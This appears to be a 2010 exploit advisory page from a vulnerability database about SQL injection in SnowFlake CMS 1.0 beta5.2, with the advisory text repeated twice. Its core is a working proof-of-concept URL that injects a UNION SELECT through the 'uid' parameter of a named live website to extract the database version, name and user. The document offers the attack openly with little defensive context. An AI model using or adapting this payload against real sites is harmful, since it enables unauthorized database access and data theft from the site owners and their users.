SnowFlake Content Management System SQL Injection

2010.07.19

Credit: Dinesh Arora

Risk: Medium

Local: Yes

Remote: Yes

CVE: N/A

CWE: CWE-89

####
# Exploit Title: Powered by SnowFlake Content Management System SQL Injection
#
# Date: 19th july 2010
#
# Author: Dinesh Arora
#
# Critical:high
#
# Affected / Tested Version : 1.0 beta5.2
#
# Sample Affected Parameter: uid
#
# contact: dinesh.dinoo@gmail.com
#
# Greetz to :b0nd, Fbih2s,Beenu,Charles ,j4ckh4x0r, punter,eberly
#
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
#
# POC: http://www.skimuseum.org/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,3,4,5,6,7--
#
#
#################
--
------------------
Regards
Dinesh
9999846893
SnowFlake - SQL Injection.txt
#################################################################
# Exploit Title: Powered by SnowFlake Content Management System SQL Injection
#
# Date: 19th july 2010
#
# Author: Dinesh Arora
#
# Critical:high
#
# Affected / Tested Version : 1.0 beta5.2
#
# Sample Affected Parameter: uid
#
# contact: dinesh.dinoo@gmail.com
#
# Greetz to :b0nd, Fbih2s,Beenu,Charles ,j4ckh4x0r, punter,eberly
#
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
#
# POC: http://www.skimuseum.org/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,3,4,5,6,7--
#
#
#################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SnowFlake Content Management System SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.